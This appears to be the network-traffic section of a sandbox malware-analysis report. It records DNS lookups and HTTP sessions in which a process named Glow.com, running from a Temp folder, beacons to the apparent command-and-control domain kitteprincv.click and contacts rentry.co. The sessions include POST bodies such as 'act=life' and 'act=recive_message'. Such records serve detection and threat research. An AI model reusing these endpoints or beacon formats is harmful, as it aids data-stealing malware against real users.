                                                                                                                                                                        Dec 21, 2024 13:02:09.519782066 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:09.519860029 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:09.521672010 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:09.521681070 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:09.522072077 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:09.523669958 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:09.523706913 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:09.523782969 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.293431044 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.293565035 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.293658018 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.293740988 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.293755054 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.293807030 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.293836117 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.298248053 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.298305035 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.298314095 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.306596994 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.306654930 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.306663036 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.347805023 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.347815990 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.394720078 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.412899017 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.457180023 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.457195997 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487152100 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487257957 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487338066 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.487365007 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487462044 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.487469912 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487582922 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487646103 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.487679005 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487694025 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.487694025 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.487701893 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.487709045 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.606796026 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.606904030 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:10.608311892 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.608684063 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:10.608722925 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:11.827227116 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:11.827347994 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:11.828747988 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:11.828787088 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:11.829134941 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:11.830569029 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:11.830740929 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:11.830789089 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:11.830889940 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:11.830904961 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:13.039833069 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:13.039971113 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:13.040030003 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:13.040153980 CET49740443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:13.040179968 CET44349740104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:13.135977030 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:13.136090040 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:13.136202097 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:13.136564970 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:13.136594057 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:14.356892109 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:14.357081890 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:14.358531952 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:14.358541965 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:14.358884096 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:14.360482931 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:14.360627890 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:14.360627890 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:14.360652924 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:15.140847921 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:15.141118050 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:15.141192913 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:15.141360998 CET49741443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:15.141390085 CET44349741104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:15.315471888 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:15.315511942 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:15.315602064 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:15.315974951 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:15.315984964 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:16.534193039 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:16.534302950 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:16.535765886 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:16.535810947 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:16.536720991 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:16.538707018 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:16.538985014 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:16.539017916 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:16.539088964 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:16.539098978 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:17.472326040 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:17.472592115 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:17.473082066 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:17.473181963 CET49743443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:17.473212957 CET44349743104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:17.622023106 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:17.622066021 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:17.622145891 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:17.622503042 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:17.622514009 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.211298943 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.211420059 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.213056087 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.213083029 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.213376045 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.214646101 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.214745998 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.214752913 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.966113091 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.966207981 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:19.966312885 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.966582060 CET49750443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:19.966593981 CET44349750104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:20.406018972 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:20.406054020 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:20.406147957 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:20.406512976 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:20.406524897 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.642606974 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.642693996 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.644279003 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.644294024 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.644619942 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.646094084 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.646990061 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647027969 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647146940 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647180080 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647306919 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647346020 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647480965 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647521973 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647672892 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647710085 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647874117 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.647911072 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.647922993 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.648087025 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.648129940 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.691333055 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.691819906 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.691895962 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.691915989 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.735326052 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.735709906 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.735783100 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.735819101 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.779359102 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:21.779658079 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.816478968 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:21.816498041 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:22.008176088 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:23.885848045 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:23.885938883 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:23.886115074 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:23.886243105 CET49756443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:23.886276960 CET44349756104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:23.894720078 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:23.894838095 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:23.894956112 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:23.895262957 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:23.895293951 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.108338118 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.113483906 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.115303993 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.115367889 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.115576029 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.116818905 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.116861105 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.116909981 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.896109104 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.896190882 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.896254063 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.896478891 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.896533966 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.896563053 CET49767443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:25.896580935 CET44349767104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:26.040137053 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:26.040185928 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:26.040291071 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:26.040730000 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:26.040736914 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.255465031 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.255557060 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.257451057 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.257456064 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.257663965 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.259191990 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.299328089 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825283051 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825320005 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825365067 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825376034 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825448036 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825470924 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825481892 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825486898 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825515985 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825520039 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825556993 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825587034 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825939894 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825948000 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:27.825965881 CET49773443192.168.2.4104.26.3.16
                                                                                                                                                                        Dec 21, 2024 13:02:27.825970888 CET44349773104.26.3.16192.168.2.4
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 21, 2024 13:01:22.469952106 CET4998453192.168.2.41.1.1.1
                                                                                                                                                                        Dec 21, 2024 13:01:22.711005926 CET53499841.1.1.1192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:05.654742002 CET5085453192.168.2.41.1.1.1
                                                                                                                                                                        Dec 21, 2024 13:02:05.974150896 CET53508541.1.1.1192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:25.898118019 CET5589753192.168.2.41.1.1.1
                                                                                                                                                                        Dec 21, 2024 13:02:26.038285971 CET53558971.1.1.1192.168.2.4
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 21, 2024 13:01:22.469952106 CET192.168.2.41.1.1.10xdc39Standard query (0)xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHuggA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:05.654742002 CET192.168.2.41.1.1.10xc1e7Standard query (0)kitteprincv.clickA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:25.898118019 CET192.168.2.41.1.1.10x5f8cStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 21, 2024 13:01:22.711005926 CET1.1.1.1192.168.2.40xdc39Name error (3)xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHuggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:05.974150896 CET1.1.1.1192.168.2.40xc1e7No error (0)kitteprincv.click104.21.43.127A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:05.974150896 CET1.1.1.1192.168.2.40xc1e7No error (0)kitteprincv.click172.67.179.135A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:26.038285971 CET1.1.1.1192.168.2.40x5f8cNo error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:26.038285971 CET1.1.1.1192.168.2.40x5f8cNo error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 21, 2024 13:02:26.038285971 CET1.1.1.1192.168.2.40x5f8cNo error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                                                                                                        • kitteprincv.click
                                                                                                                                                                        • rentry.co
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.449738104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:07 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-12-21 12:02:08 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:08 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=46ooehevl4qcrm2rqab4got3v7; expires=Wed, 16 Apr 2025 05:48:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mFBFYViWYXm0JYcqdDKfWxIS3zkh0u6B40L1%2FDfZN47qWP6%2BmQQtapkjpEF5pMqINo9CncLAA8UpiS0akcNgQB9fx04rz8suAKaTgumaK%2BFn%2FW1jaSBJIFpy7a6dkhaV3T20Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8accbdb0cbc-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1632&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1736028&cwnd=175&unsent_bytes=0&cid=331b5e614d1a7821&ts=1051&x=0"
                                                                                                                                                                        2024-12-21 12:02:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-12-21 12:02:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.449739104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:09 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 50
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:09 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 26 6a 3d
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl3clear&j=
                                                                                                                                                                        2024-12-21 12:02:10 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:10 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=qdduvle2t5fbhlig62tvq53d1a; expires=Wed, 16 Apr 2025 05:48:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAD11BiqmwHkopGWr5lPB3qCfzm5USeZxTA1vPlPMLxhJ%2BTF0w6DevKrU9%2BoebXZDaE59C5Gr4GJbz9swLP2R4zpaQQUVKrLCLEHnnb3%2FYCeQBliuN5U%2BmNIFbD6lavJCk0cZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8bb380b42f4-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
